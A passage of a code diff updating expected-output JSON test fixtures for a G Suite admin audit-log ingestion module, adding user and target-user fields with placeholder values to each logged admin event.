"event.action": "UPDATE_CHROME_OS_PRINT_SERVER", @@ -560,7 +590,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "INSERT_CHROME_OS_PRINTER", @@ -608,7 +641,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CHROME_OS_PRINTER", @@ -656,7 +692,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CHROME_OS_PRINTER", @@ -706,7 +745,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_SETTING", @@ -758,7 +800,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_USER_SETTING", @@ -810,7 +855,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ISSUE_DEVICE_COMMAND", @@ -863,7 +911,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", @@ -914,7 +965,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", @@ -962,7 +1016,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DEVICE", @@ -1011,7 +1068,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CONTACTS_SETTING", @@ -1064,6 +1124,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json index 3f0711022768..825e497e5a0f 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json @@ -50,6 +50,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json index b5c6d47d8b3b..01b558fdf49f 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_ROLE", @@ -97,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_ROLE", @@ -146,7 +155,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_PRIVILEGE", @@ -196,7 +208,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_PRIVILEGE", @@ -246,7 +261,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_ROLE", @@ -295,7 +313,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_ROLE", @@ -344,7 +365,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNASSIGN_ROLE", @@ -395,6 +419,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json index 311ecf3e2378..da5410ee7d39 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DRIVE_DATA_RESTORE", @@ -100,7 +106,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_DOCS_SETTING", @@ -156,6 +168,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json index ff5c3d1d2a59..05143097e3d0 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_APPLICATION", @@ -96,7 +99,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_APPLICATION_TO_WHITELIST", @@ -145,7 +151,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ADVERTISEMENT_OPTION", @@ -195,7 +204,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ALERT", @@ -243,7 +255,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ALERT_CRITERIA", @@ -291,7 +306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_ALERT", @@ -339,7 +357,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALERT_RECEIVERS_CHANGED", @@ -389,7 +410,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_ALERT", @@ -438,7 +462,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALERT_STATUS_CHANGED", @@ -488,7 +515,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_DOMAIN_ALIAS", @@ -537,7 +567,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_DOMAIN_ALIAS", @@ -586,7 +619,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SKIP_DOMAIN_ALIAS_MX", @@ -635,7 +671,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_DOMAIN_ALIAS_MX", @@ -684,7 +723,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_DOMAIN_ALIAS", @@ -734,7 +776,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", @@ -784,7 +829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", @@ -834,7 +882,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_API_ACCESS", @@ -885,7 +936,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "AUTHORIZE_API_CLIENT_ACCESS", @@ -938,7 +992,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_API_CLIENT_ACCESS", @@ -987,7 +1044,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_LICENSES_REDEEMED", @@ -1037,7 +1097,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_AUTO_ADD_NEW_SERVICE", @@ -1086,7 +1149,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PRIMARY_DOMAIN", @@ -1135,7 +1201,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_WHITELIST_SETTING", @@ -1186,7 +1255,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", @@ -1238,7 +1310,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CONFLICT_ACCOUNT_ACTION", @@ -1288,7 +1363,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_FEEDBACK_SOLICITATION", @@ -1339,7 +1417,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_CONTACT_SHARING", @@ -1389,7 +1470,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_PLAY_FOR_WORK_TOKEN", @@ -1437,7 +1521,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_USE_CUSTOM_LOGO", @@ -1487,7 +1574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CUSTOM_LOGO", @@ -1535,7 +1625,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA", @@ -1585,7 +1678,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_LOCALIZATION_SETTING", @@ -1636,7 +1732,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO", @@ -1686,7 +1785,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_PLAY_FOR_WORK_TOKEN", @@ -1734,7 +1836,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VIEW_DNS_LOGIN_DETAILS", @@ -1782,7 +1887,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_DEFAULT_LOCALE", @@ -1832,7 +1940,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE", @@ -1882,7 +1993,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_NAME", @@ -1931,7 +2045,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES", @@ -1980,7 +2097,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_SUPPORT_MESSAGE", @@ -2030,7 +2150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_TRUSTED_DOMAINS", @@ -2078,7 +2201,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_TRUSTED_DOMAINS", @@ -2126,7 +2252,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_EDU_TYPE", @@ -2176,7 +2305,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY", @@ -2226,7 +2358,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SSO_ENABLED", @@ -2276,7 +2411,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SSL", @@ -2326,7 +2464,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO", @@ -2376,7 +2517,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GENERATE_TRANSFER_TOKEN", @@ -2423,7 +2567,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_BACKGROUND_COLOR", @@ -2473,7 +2620,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_BORDER_COLOR", @@ -2523,7 +2673,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_ACTIVITY_TRACE", @@ -2573,7 +2726,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "PLAY_FOR_WORK_ENROLL", @@ -2622,7 +2778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "PLAY_FOR_WORK_UNENROLL", @@ -2670,7 +2829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MX_RECORD_VERIFICATION_CLAIM", @@ -2720,7 +2882,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TOGGLE_NEW_APP_FEATURES", @@ -2770,7 +2938,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL", @@ -2820,7 +2991,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPLOAD_OAUTH_CERTIFICATE", @@ -2868,7 +3042,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REGENERATE_OAUTH_CONSUMER_SECRET", @@ -2916,7 +3093,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OPEN_ID_ENABLED", @@ -2966,7 +3146,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ORGANIZATION_NAME", @@ -3016,7 +3199,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OUTBOUND_RELAY", @@ -3068,7 +3254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PASSWORD_MAX_LENGTH", @@ -3118,7 +3307,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PASSWORD_MIN_LENGTH", @@ -3168,7 +3360,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", @@ -3218,7 +3413,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", @@ -3269,7 +3467,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_APPLICATION", @@ -3318,7 +3519,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_APPLICATION_FROM_WHITELIST", @@ -3367,7 +3571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RENEW_DOMAIN_REGISTRATION", @@ -3417,7 +3624,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RESELLER_ACCESS", @@ -3466,7 +3676,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RULE_ACTIONS_CHANGED", @@ -3514,7 +3727,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_RULE", @@ -3562,7 +3778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RULE_CRITERIA", @@ -3610,7 +3829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_RULE", @@ -3658,7 +3880,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_RULE", @@ -3707,7 +3932,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RULE_STATUS_CHANGED", @@ -3757,7 +3985,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_SECONDARY_DOMAIN", @@ -3806,7 +4037,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_SECONDARY_DOMAIN", @@ -3855,7 +4089,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SKIP_SECONDARY_DOMAIN_MX", @@ -3904,7 +4141,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_SECONDARY_DOMAIN_MX", @@ -3953,7 +4193,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_SECONDARY_DOMAIN", @@ -4002,7 +4245,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DOMAIN_SECONDARY_EMAIL", @@ -4052,7 +4298,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SSO_SETTINGS", @@ -4101,7 +4350,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GENERATE_PIN", @@ -4148,7 +4400,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_RULE", @@ -4196,6 +4451,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json index 1db80ed600bd..ab2ea5b15fa0 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EMAIL_LOG_SEARCH", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EMAIL_UNDELETE", @@ -152,7 +158,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_EMAIL_SETTING", @@ -208,7 +220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GMAIL_SETTING", @@ -260,7 +275,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_GMAIL_SETTING", @@ -312,7 +330,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_GMAIL_SETTING", @@ -364,7 +385,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REJECT_FROM_QUARANTINE", @@ -413,7 +437,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RELEASE_FROM_QUARANTINE", @@ -462,6 +489,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json index ff894cd6c054..b8d461675313 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_GROUP", @@ -99,7 +102,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_DESCRIPTION", @@ -150,7 +156,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GROUP_LIST_DOWNLOAD", @@ -198,7 +207,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_GROUP_MEMBER", @@ -251,7 +263,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "REMOVE_GROUP_MEMBER", @@ -304,7 +324,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER", @@ -359,7 +387,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", @@ -414,7 +450,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + 